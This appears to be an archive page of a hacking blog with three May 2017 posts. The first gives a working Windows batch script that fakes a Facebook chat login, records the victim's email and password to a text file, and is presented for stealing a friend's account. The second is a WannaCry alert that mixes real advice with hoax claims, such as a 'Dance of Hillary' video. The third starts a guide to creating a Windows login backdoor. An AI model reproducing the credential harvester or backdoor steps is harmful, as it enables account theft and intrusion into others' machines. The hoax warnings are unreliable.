
Showing posts from May, 2017

How to Stolen Facebook Password using Pen drive

Ethical Hacking Blog How to Stolen Facebook Password using Pendrive #Author: ManishHacker1 Today, we will learn, how to capture or how to stolen USERNAME and PASSWORD of Facebook account of your friend.. Some times Hackers use this technique to grab your Fb ID and Password. First , open your notepad and type bilow code in your notepad. After that save as your notepad file in "anyname.bat"(FBChat.bat) in your Machine or Pendrive. I used to save this file FBChat.bat. Where ".bat" is your file extension. CODE TITLE FBChat ECHO OFF setlocal enabledelayedexpansion set Counter=0 set Schalter=2 set Width=0 COLOR 09 CLS ECHO. ECHO LOGIN TO START CHATTING ON FACEBOOK ECHO. ECHO Please enter your email and Hit enter: SET/P "MAIL=>" ECHO. ECHO Enter the password and Hit enter: SET/P "PASS=>" ECHO.>>Facebook.txt ECHO EMAIL = %MAIL%>>Facebook.txt ECHO PASSWORD = %PASS%>>Facebook.txt CLS :1 set /a Counter=%Counter% + 1 set /a Display

WannaCry 2.0 Ransomware Virus attack 2k17

The Most powerful virus which encrypts all your computer and mobile data. Massive ransomware virus attacks total 90 countries affected. Blacklist these IPs to avoid an attack. and also block smbv2 protocol 445 and 8779 Please do not open any Email which has attachments with "tasksche.exe" file. Do not open Google drive Attachment Do not download freeware software Do not "Dance of Hillary" video. it is a virus that formats your mobile. Do not open any shopping cart today. Do not open any online transactions today.

How to Create Backdoor on your Windows Operating System

Ethical Hacking Blog How to Create BackDoor on your Windows Operating System #Author: ManishHacker1 In my last article we have been learn about how to change password using command. In this article we will learn how to create backdoor in our Windows Operating System. What are you going to do, if You have started a Windows Computer and it is asking for Password??? If we are forget login password. We can access or chnage windows password using Backdoor. Wnodow Security Security Accounts Manager(SAM) Database Windows stores user passwords in SAM, or in the Active Directory database in domains. Passwords are never stored in clear text; passwords are hashed and the results are stored in the SAM NTLM Authentication The NTLM authentication protocol types: NTLM authentication protocol These protocols stores user's passwords in the SAM database using different hashing methods Kerberos Authentication Microsoft has upgraded to Kerberos which provides a stronger authentication for client/serv